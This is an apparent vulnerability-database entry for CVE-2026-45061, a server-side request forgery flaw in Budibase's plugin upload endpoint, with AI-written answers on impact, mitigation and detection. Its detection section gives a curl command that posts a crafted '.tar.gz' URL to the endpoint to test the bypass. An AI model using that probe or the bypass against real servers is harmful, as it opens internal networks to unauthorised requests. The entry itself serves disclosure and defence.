CVE-2026-45061
Received Received - Intake
SSRF via Plugin URL Validation Bypass in Budibase

Publication date: 2026-05-27

Last updated on: 2026-05-27

Assigner: GitHub, Inc.

Description
Budibase is an open-source low-code platform. Prior to 3.35.10, the Plugin URL upload endpoint (POST /api/plugin) validates the submitted URL with a single substring check: url.includes(".tar.gz"). Any URL containing .tar.gz anywhere in the string β€” in the path, query string, or fragment β€” passes this check. The URL then proceeds directly to fetchWithBlacklist() with no further validation of host, scheme, or path. Standalone, this vulnerability is blocked by Budibase's default SSRF blacklist, which covers private IP ranges. But the URL validation layer itself is broken regardless, and it directly enables SSRF in two realistic situations: (1) when chained with the BLACKLIST_IPS bypass ([001]), where the blacklist is empty; and (2) when the plugin server follows HTTP redirects from an external URL to an internal target (the default node-fetch behavior with redirect: 'follow'). This vulnerability is fixed in 3.35.10.
CVSS Scores
EPSS Scores
Probability:
Percentile:
Meta Information
Published
2026-05-27
Last Modified
2026-05-27
Generated
2026-05-28
AI Q&A
2026-05-27
EPSS Evaluated
N/A
NVD
CVE-2026-45061
EUVD
EUVD-2026-32586
Affected Vendors & Products
Showing 1 associated CPE
Vendor Product Version / Range
budibase budibase 3.35.10
Helpful Resources
Exploitability
CWE
CWE Icon
KEV
KEV Icon
CWE ID Description
CWE-918 The web server receives a URL or similar request from an upstream component and retrieves the contents of this URL, but it does not sufficiently ensure that the request is being sent to the expected destination.
Attack-Flow Graph
AI Powered Q&A
Can you explain this vulnerability to me?

This vulnerability exists in Budibase, an open-source low-code platform, prior to version 3.35.10. The issue is with the Plugin URL upload endpoint (POST /api/plugin), which validates submitted URLs using a simple substring check for '.tar.gz'. Any URL containing '.tar.gz' anywhere in the string passes this check without further validation of the host, scheme, or path.

Because of this weak validation, the URL is then passed to a function that fetches the resource without proper restrictions. Although Budibase has a default SSRF (Server-Side Request Forgery) blacklist blocking private IP ranges, this vulnerability can be exploited in two realistic scenarios: when the blacklist is bypassed or empty, and when the plugin server follows HTTP redirects from an external URL to an internal target.

This flaw effectively enables SSRF attacks, allowing an attacker to make the server perform unauthorized requests, potentially to internal or protected resources.


How can this vulnerability impact me? :

This vulnerability can allow an attacker to perform Server-Side Request Forgery (SSRF) attacks by tricking the Budibase server into making unauthorized requests to internal or protected network resources.

Such SSRF attacks can lead to unauthorized access to internal systems, exposure of sensitive information, or interaction with internal services that are not meant to be publicly accessible.

The impact is significant as indicated by the CVSS score of 7.7, with a high confidentiality impact, meaning sensitive data could be exposed, although integrity and availability are not directly affected.


What immediate steps should I take to mitigate this vulnerability?

The vulnerability is fixed in Budibase version 3.35.10. The immediate step to mitigate this vulnerability is to upgrade Budibase to version 3.35.10 or later.

Additionally, be aware that the vulnerability arises from insufficient URL validation in the plugin URL upload endpoint and can be exploited when the SSRF blacklist is bypassed or when HTTP redirects lead to internal targets. Ensuring the SSRF blacklist is properly configured and avoiding following redirects from untrusted URLs can help reduce risk.


How does this vulnerability affect compliance with common standards and regulations (like GDPR, HIPAA)?:

CVE-2026-45061 is a Server-Side Request Forgery (SSRF) vulnerability that can allow attackers to access internal services and potentially steal sensitive data such as IAM credentials or database records.

Such unauthorized access to sensitive data could lead to violations of data protection regulations like GDPR or HIPAA, which require strict controls over personal and sensitive information.

Therefore, if exploited, this vulnerability may compromise compliance with these standards by exposing protected data to unauthorized parties.


How can this vulnerability be detected on my network or system? Can you suggest some commands?

This vulnerability can be detected by monitoring and analyzing requests to the Budibase Plugin URL upload endpoint (POST /api/plugin) for suspicious URLs containing the substring ".tar.gz" that may lead to SSRF attempts.

You can look for unusual outbound HTTP requests from the Budibase server, especially those that follow redirects to internal IP addresses or private network ranges, which may indicate exploitation attempts.

Suggested commands to detect potential exploitation include:

  • Using network monitoring tools like tcpdump or tshark to capture outgoing HTTP requests from the Budibase server:
  • tcpdump -i <interface> -A 'tcp port 80 or tcp port 443' | grep '.tar.gz'
  • Using curl or wget to test the plugin endpoint with crafted URLs to see if the server fetches internal resources:
  • curl -X POST https://<budibase-server>/api/plugin -d '{"url":"http://example.com/malicious.tar.gz"}' -H 'Content-Type: application/json'
  • Checking Budibase server logs for POST requests to /api/plugin containing URLs with ".tar.gz" and analyzing any subsequent internal network requests.

Additionally, reviewing the configuration for BLACKLIST_IPS and monitoring for any bypass attempts or redirects to internal IPs can help detect exploitation.


Ask Our AI Assistant
Need more information? Ask your question to get an AI reply (Powered by our expertise)
0/70
EPSS Chart